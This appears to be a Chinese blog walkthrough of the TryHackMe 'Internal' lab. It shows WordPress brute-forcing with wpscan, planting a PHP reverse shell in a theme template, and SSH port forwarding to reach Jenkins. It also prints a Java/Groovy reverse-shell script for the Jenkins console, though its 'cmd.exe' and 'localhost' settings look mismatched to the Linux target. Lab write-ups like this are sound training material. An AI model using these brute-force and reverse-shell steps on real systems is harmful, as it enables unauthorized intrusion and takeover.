TRY HACK ME ｜ INTERNAL「渗透测试挑战02」

最新推荐文章于 2024-07-30 21:30:00 发布

AKA航仔

最新推荐文章于 2024-07-30 21:30:00 发布

阅读量1k

点赞数 2

文章标签：安全 macos web安全

本文链接：https://blog.csdn.net/AKAHRZ/article/details/125237695

版权

TRY HACK ME 渗透测试靶场，以基础为主层层深入，知识点讲解详细，对于想实现从零到一飞跃的白客，TRY HACK ME无非是最好的选择。而网络上资源良莠不齐，好的资源难找的一逼。因此，今天起我将与大家一起详细学习THM重要的ROOM里的内容，力求让每个人都能理解、掌握其中的内容，让我们一起学习、一起å进步、一起GET THE FLAG！

THM靶场：INTERNAL

很简单的靶场，有手就行

INTERNAl

启动机器，连接openvpn，点击“Start Machine”获取目标IP，本次测试使用KAIL作为攻击机，连接成功后显示如下：
apache2
可以看到，这是一个apache的默认页面，根据题目的提示，我们需要先将主机添加到 /etc/hosts ，我们先nano 打开，然后将域名internal.thm添加上,我这里在MAC和KALI上都设置了，只显示一个MAC的页面供大家参考

internal.thm
然后，我们使用gobuster来爆破一波目录，命令构造如下：

gobuster dir -u http://10.10.103.9/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error

可以看到扫描结果里，有wordpress页面，所以说可以看出来这是一个用wp搭建的blog网站，我们看下管理页面，即wp-admin：

看到wp-admin页面，我们直接搞一波wpscan，扫一下有没有相关的漏洞，构造命令：

wpscan --url http://10.10.103.9/blog -e ap,at,tt,cb,dbe,u,m

使用 -e 选项来枚举所有插件、所有主题、timthumbs、配置备份、数据库导出、用户和媒体，结果如下： admin

分析下没什么有用的信息，只有一个admin默认用户，下面我们直接爆破，构造命令：

wpscan --url http://10.10.103.9/blog -U admin -P /usr/share/wordlists/rockyou.txt

结果如下：

获取了用户名和密码后，我们登录WORDPRESS页面，进入后，我们上传反向shell，KALI里自带php-reverse-shell.php，复制粘贴到后台，在404模板下修改，注意这里要修改端口号和IP，然后保存下：

反向shell

成功后在URL上访问页面并构造nc -lnvp 1234监听端口，获取shell成功！ shell

列举常见文件和目录，发现了一个用户的凭据：
用户凭据
使用ssh登录成功！

列举全部文件，发现了flag文件，cat后再次发现一个jenkins.txt文件，很有可能网站上还有jenkins服务
get flag
我们再cat jenkins.txt文件，果然如我们所料，在8080端口上开启了jenkins服务

jenkins

由于端口 8080 只能通过本地访问，设置端口转发以便将流量重定向到端口 1234 上的 localhost 到端口 8080 上的目标机器，构造命令：

ssh -f -N -L 1234:127.0.0.1:8080 aubreanna@internal.thm

输入密码，与之前相同
成功看到页面
看到Jenkins页面，直接打开BP抓包爆破，常规套路，这里就不赘述了，进去后有个可以传脚本的页面，上传一个大佬写的脚本，具体如下：

String host=”localhost”;
int port=8044;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

script console

最后一步，设置监听端口，直接获取root权限，最后搜索一波flag，搞定！

root get

INTERNAL 靶场通关小结

可能是因为做的题目和写的文章已经比较多了，现在再看这样的题目只觉得很简单，得心应手、行云流水，其实无非都是那几个常规的突破口，关键还是在于培养自己信息收集的能力和洞察问题的耐心。如果有部分不明白的，可以把流程反反复复的多看几遍，同时也非常欢迎大家私信我，如果觉得内容做的不错的话，也可以关注我的公众号：HACKER 航仔以获取最新消息并与我联系，十分感谢能看到这里的各位，虽然制作不易，看到你们的点赞我还是很开心的！我们下期再见，拜了个拜～～～